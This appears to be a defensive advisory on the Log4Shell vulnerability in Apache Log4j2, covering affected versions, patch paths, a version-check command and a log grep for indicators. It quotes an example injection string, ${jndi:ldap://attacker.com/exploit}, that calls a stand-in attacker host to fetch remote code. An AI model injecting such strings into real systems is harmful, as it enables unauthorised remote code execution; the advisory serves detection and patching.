Disclosed December 9, 2021, Log4Shell is a remote code execution vulnerability in Apache Log4j2 - a Java logging library used in hundreds of millions of applications. CVSS score: 10.0. No authentication required.
What It Does
Log4j2 supports JNDI (Java Naming and Directory Interface) lookups, which let the library fetch remote objects at runtime. The problem: Log4j was logging user-supplied input without sanitizing it.
An attacker sends a crafted string like ${jndi:ldap://attacker.com/exploit} in any logged field - HTTP headers, usernames, form fields, even User-Agent strings. Log4j fetches and executes the remote payload. The attacker gets full remote code execution with server-level privileges.
No credentials. No interaction from a user. One malicious string.
Who's Affected
- CVE-2021-44228 - Log4j2 versions 2.0-beta9 through 2.14.1 (CVSS 10.0)
- CVE-2021-45046 - Log4j2 versions 2.0-beta9 through 2.15.0 (CVSS 9.0, RCE possible)
- CVE-2021-45105 - Log4j2 versions 2.0-beta9 through 2.16.0 (CVSS 7.5, DoS)
- CVE-2021-4104 - Log4j 1.x when JNDI is used in configuration
Affected products include Minecraft, VMware, Cisco, IBM WebSphere, and thousands of enterprise Java applications. Wiz research found 93% of cloud enterprise environments were initially vulnerable.
Technical Details
| Detail | Info |
|---|---|
| CVE | CVE-2021-44228 |
| CVSS Score | 10.0 (Critical) |
| Attack Vector | Network |
| Auth Required | None |
| User Interaction | None |
| Disclosed | December 9, 2021 |
Patch Now
Upgrade based on your Java version:
- Java 8+ → Update to Log4j 2.17.0 or later
- Java 7 → Update to Log4j 2.12.2
- Java 6 → Update to Log4j 2.3.1
Version 2.15.0 was initially released as the fix but is still vulnerable to CVE-2021-45046. Version 2.16.0 fixes that but introduces CVE-2021-45105. Go straight to 2.17.0.
To check your Log4j version:
find / -name "log4j*.jar" 2>/dev/nullCheck for Compromise
Look for JNDI lookup patterns in your web server and application logs:
grep -r '\$\{jndi:' /var/log/Indicators of compromise include outbound LDAP connections on port 389, unexpected DNS lookups to unfamiliar domains, and new processes spawned by your Java application server. If you find hits, assume breach - don't just patch and move on.
Why This Matters in 2026
Log4Shell is still being actively exploited. CISA added it to the Known Exploited Vulnerabilities catalog, and it remains a top vector for ransomware groups including Conti. Legacy systems and container images that haven't been rebuilt since 2021 are still showing up vulnerable in enterprise scans.
Bottom Line
Log4Shell is a perfect 10.0 - trivial to exploit, zero auth required, and embedded deep in the Java ecosystem. If you run any Java applications, audit your Log4j versions today. Upgrade to 2.17.0 minimum. Then grep your logs for JNDI strings - you may already have been hit.